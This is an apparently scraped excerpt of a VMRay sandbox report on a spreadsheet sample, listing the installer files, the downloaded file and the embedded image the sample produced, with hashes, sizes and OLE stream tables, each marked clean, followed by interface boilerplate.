SHA256 44012e2ab82d942948c4afd0dbee5bb9423f509c67fbe58bd47f693d43632181 Copy to Clipboard
SSDeep 3:qRFiJ2totWIlXllMl5llqKZ4IEj+toXl:qjyxk2npjqk Copy to Clipboard
ImpHash -
C:\Windows\Installer\18fe687.ipi Dropped File OLE Compound
clean
...
»
MIME Type application/CDFV2
File Size 20.00 KB
MD5 8dbe3854085919ed873b38ce6aae483f Copy to Clipboard
SHA1 80c68e65d1b34d68e0900e289d6d1e05421374b6 Copy to Clipboard
SHA256 f509e4070a9c00a8ec654580cd2d62612c7a5f55b29229bb0390d24f820ba967 Copy to Clipboard
SSDeep 48:fhsz+XLhluQh8fgS5GnqluSi+P0gSIRKif:fuz+6Qh8YoWOV Copy to Clipboard
ImpHash -
CFB Streams (17)
»
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 76 Bytes
...
Root\䕙䇲䆸㷷䐤䠨 2 12 Bytes
...
Root\䒕䒪㾱䈶䠵 3 18 Bytes
...
Root\䈜䈯䗦䒬䖱 4 36 Bytes
...
Root\䒏䇯䕨䠶 5 128 Bytes
...
Root\䕙䓲䕨䌷䖨 6 664 Bytes
...
Root\䌝䈰䗜䐤㵳䚲 7 20 Bytes
...
Root\䌝䈰䗜䐤㱳䊬䠫 8 16 Bytes
...
Root\䄍䄷䄥䈶䄙䋷 9 64 Bytes
...
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
...
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 40 Bytes
...
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
...
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
...
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
...
C:\Windows\Installer\MSI7141.tmp Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 1.89 KB
MD5 7d610eefec7ce65bc89d474d86964169 Copy to Clipboard
SHA1 2b2b785aec16916225d56e71cba2d1775d2144fa Copy to Clipboard
SHA256 e9405795de191f85662c040052e8d97652d2f896d21d92ac8ee66c55912ee4dd Copy to Clipboard
SSDeep 24:ygey4BFHwVwM2url1fycmGy2TCGZpUFxwZOFP37s9g2Efljaceg4ccSDhiSLuUpd:y5SVEujwuUxwZyP37sq2EflkUD8SZL Copy to Clipboard
ImpHash -
C:\Config.Msi\18fe688.rbs Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 1.97 KB
MD5 087f4a1d3f6acb66ce71a9ee75a7ed6b Copy to Clipboard
SHA1 4bad72787acfa5e408a925d69fffc0b0234fbc5e Copy to Clipboard
SHA256 a7e50ee6fb908a5dffaf110e79145e8ed2f5addcd9e0825eec68854422a3fd39 Copy to Clipboard
SSDeep 24:Vogey4BFHwVw+63exq/Yziu75BpUQv1nwZrwGw0dnwsZFeV5kFPGO7L7fLDhiSu9:65SV+uxq/Yuu75r/nwZq8P9XTLD8SQ Copy to Clipboard
ImpHash -
C:\Windows\Installer\18fe687.ipi Dropped File OLE Compound
clean
...
»
MIME Type application/CDFV2
File Size 20.00 KB
MD5 98b7558e2f84062761ecaa9e1717f47e Copy to Clipboard
SHA1 c4f33fff1ff0c6ab1c2353b4829c3f5303a7c33a Copy to Clipboard
SHA256 865de1c1ef69145af8b000cd513728bb8a82a93247c6fd8aaf29c7f316e89ac8 Copy to Clipboard
SSDeep 48:dR0McDHYluKh8fgS5GnqluSi+P0gSIRKif:dRBYKh8YoWOV Copy to Clipboard
ImpHash -
CFB Streams (17)
»
Name ID Size Actions
Root\䕙䇲䆸㲷䠧 1 0 Bytes -
Root\䕙䇲䆸㷷䐤䠨 2 0 Bytes -
Root\䒕䒪㾱䈶䠵 3 18 Bytes
...
Root\䈜䈯䗦䒬䖱 4 0 Bytes -
Root\䒏䇯䕨䠶 5 0 Bytes -
Root\䕙䓲䕨䌷䖨 6 0 Bytes -
Root\䌝䈰䗜䐤㵳䚲 7 0 Bytes -
Root\䌝䈰䗜䐤㱳䊬䠫 8 0 Bytes -
Root\䄍䄷䄥䈶䄙䋷 9 0 Bytes -
Root\䌍䎶䕙䐲䗳 10 0 Bytes -
Root\䌍䎶䈜䌵䏤 11 0 Bytes -
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 12 2 Bytes
...
Root\䉊䈷㻵䅨䒲䠷 13 0 Bytes -
Root\䕝䑤䄶䗦䒬㷱䐤䠨 14 40 Bytes
...
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 15 20 Bytes
...
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 16 16 Bytes
...
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 17 2 Bytes
...
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\version[1].php Downloaded File Stream
clean
Known to be clean.
...
»
Parent File analysis.pcap
MIME Type application/octet-stream
File Size 1 Bytes
MD5 cfcd208495d565ef66e7dff9f98764da Copy to Clipboard
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c Copy to Clipboard
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 Copy to Clipboard
SSDeep 3:V:V Copy to Clipboard
ImpHash -
0.PNG Embedded File Image
clean
...
»
Parent File C:\Users\kEecfMwgj\Desktop\f2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2.xls
MIME Type image/png
File Size 234.43 KB
MD5 09a30f566b788967041a2f2e4265f398 Copy to Clipboard
SHA1 c6a9ac06a18d036ebd8b2a99f42dd8ed9622066e Copy to Clipboard
SHA256 cba5ee9776e575d159d95441b806c1bcc07950e1d25c61c275ad173eed1189a6 Copy to Clipboard
SSDeep 6144:psHfsS9Jpu/P+bJOre06MCVDIinIKx1buIsaj2r0Eh:Y04JIoJg6MGDdIK7Ym2rL Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image